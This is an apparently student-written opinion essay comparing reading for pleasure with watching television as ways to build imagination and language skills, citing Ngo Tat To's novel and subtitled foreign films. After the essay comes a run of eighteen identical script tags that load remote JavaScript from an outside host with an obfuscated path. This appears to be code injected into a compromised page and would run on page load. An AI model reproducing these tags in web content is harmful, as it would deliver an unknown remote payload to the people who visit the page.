Reading for pleasure can develop imagination and language skills better than watching TV. To what extent you agree or disagree?

There is a widely held belief that reading for enjoyment is a better approach to improving language learning and creativity. While reading undoubtedly offers significant benefits, I believe that watching television can be equally, if not more, effective in developing imagination and language skills."

Undoubtedly, reading books can significantly enhance imagination and language skill. While reading, readers are required to use their imagination and creativity to interpret the messages conveyed. For instance, when reading Tat Den by Vietnamese writer Ngo Tat To, readers have to visualize the contexts through authors' descriptions. This allows them to fully understand the plot and feel truly sympathetic with the main character and the hardships she had been through. Moreover, books are a wonderful reference source for language learners. By reading various book genres, they can not only sharpen writing styles but also expand grammatical structures and enrich lexical resources and use them in appropriate contexts. Hence, books, in general, may foster brain capacity and enhance language skills.

Conversely, carefully selected programs can significantly contribute to the development of brain capability and language skills. While talent shows and sports events are primarily for recreation and to help people ease the burden of life, other programs, such as news or discoveries, are ideal for the development of creativity. These TV programs provide realistic and vibrant depictions of life, enabling viewers to get a better grasp at traditions and customs of countries around the world. Additionally, foreign movies with subtitles are considered a powerful facilitator for language learners. They can practice pronunciation, consolidate collocations, pick up conversational language, and sharpen listening skills, which are not usually focused on in many schools.

In conclusion, no matter if it is books or TV programs, as long as learners are aware of what they expect to learn and choose appropriate learning methods and programs, they will eventually become a powerful tool for education.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>